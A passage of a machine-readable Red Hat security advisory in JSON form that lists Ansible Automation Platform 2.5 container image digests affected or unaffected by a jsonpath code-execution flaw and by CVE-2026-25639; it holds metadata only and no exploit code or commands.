"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "jsonpath: jsonpath: Arbitrary Code Execution via unsafe JSON Path expression evaluation"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x",
